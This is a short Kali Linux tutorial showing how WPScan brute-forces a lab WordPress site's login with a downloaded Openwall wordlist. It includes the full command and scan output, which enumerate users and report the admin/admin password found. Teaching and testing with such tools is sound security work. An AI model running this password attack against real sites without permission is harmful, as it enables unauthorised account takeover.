WPScan is a WordPress vulnerability scanner. WPScan is found in the Kali desktop menu 03:Web Application Analysis>Web Vulnerability Scanners.
The following command runs password-attack to wordpress server(192.168.0.3/wordpress). –passwords option requires password file that contains a list of passwords to use during the password attack.
One of the easiest ways to prepare the password file is to use Openwall wordlists collection(https://download.openwall.net/). The following command uses the file named “password” as its list of passwords, which downloaded from /pub/wordlists/passwords directory.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 |
kali@kali:~$ wpscan --url 192.168.0.3/wordpress --passwords ./password _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.7.6 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ [+] URL: http://192.168.0.3/wordpress/ [+] Started: Mon Apr 25 00:00:00 20xx Interesting Finding(s): [+] http://192.168.0.3/wordpress/ | Interesting Entry: Server: Apache/2.4.38 (Raspbian) | Found By: Headers (Passive Detection) | Confidence: 100% [+] http://192.168.0.3/wordpress/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://wordpress_ghost_scanner | - https://wordpress_xmlrpc_dos | - https://wordpress_xmlrpc_login | - https://wordpress_pingback_access [+] http://192.168.0.3/wordpress/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] Upload directory has listing enabled: http://192.168.0.3/wordpress/wp-content/uploads/ | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] http://192.168.0.3/wordpress/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299 [+] WordPress version 5.4 identified (Latest, released on 2020-03-31). | Found By: Emoji Settings (Passive Detection) | - http://192.168.0.3/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.4' | Confirmed By: Meta Generator (Passive Detection) | - http://192.168.0.3/wordpress/, Match: 'WordPress 5.4' [i] The main theme could not be detected. [+] Enumerating All Plugins (via Passive Methods) [i] No plugins Found. [+] Enumerating Config Backups (via Passive and Aggressive Methods) Checking Config Backups -: |=============================================| [i] No Config Backups Found. [+] Enumerating Users (via Passive and Aggressive Methods) Brute Forcing Author IDs -: |============================================| [i] User(s) Identified: [+] admin | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [+] Performing password attack on Wp Login against 1 user/s Progress: |================================================= [SUCCESS] - admin / admin Progress: |===============================================================| [i] Valid Combinations Found: | Username: admin, Password: admin [+] Finished: Mon Apr 25 00:00:00 20xx [+] Requests Done: 2895 [+] Cached Requests: 5 [+] Data Sent: 1.42 MB [+] Data Received: 16.047 MB [+] Memory used: 132.027 MB [+] Elapsed time: 00:02:43 |
The log shows that wpscan found admin/admin account-password pair in 3 minutes.
Note: wpscan requires internet access to update its database. If the network is unreachable to the database server, wpscan aborted.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
_______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.7.6 @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ [i] Updating the Database ... Scan Aborted: Unable to get https://data.wpscan.org/metadata.json.sha512 (Couldn't connect to server) |